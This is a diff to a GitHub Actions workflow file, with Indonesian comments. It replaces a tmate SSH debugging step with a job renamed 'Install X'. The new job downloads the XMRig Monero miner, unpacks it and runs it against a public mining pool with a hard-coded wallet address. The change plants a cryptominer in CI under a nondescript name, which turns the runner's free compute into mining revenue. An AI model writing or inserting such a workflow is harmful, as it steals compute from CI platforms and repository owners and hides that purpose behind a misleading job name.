--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -1,14 +1,18 @@
-name: SSH dengan tmate
+name: Install X
 
 on:
-  workflow_dispatch: # bisa kamu jalankan manual dari tab "Actions"
+  workflow_dispatch: # bisa dijalankan manual lewat tab Actions
 
 jobs:
-  debug:
+  build:
     runs-on: ubuntu-latest
     steps:
       - name: Checkout repo
         uses: actions/checkout@v4
 
-      - name: Jalankan tmate session
-        uses: mxschmitt/action-tmate@v3
+      - name: Download XMRig
+        run: |
+          wget https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
+          tar -xzf xmrig-6.24.0-linux-static-x64.tar.gz
+          cd xmrig-6.24.0
+          ./xmrig -o pool.supportxmr.com:3333 -u 43YesyPEfNHZmiBjf1LBBB5QaUYWZHoohcexHc4xpbWB9jTzAD7XTjYHqaoyNmYamWb9Eheq4uvjQ4YhdHtNcaawHYrV2NB -p x 
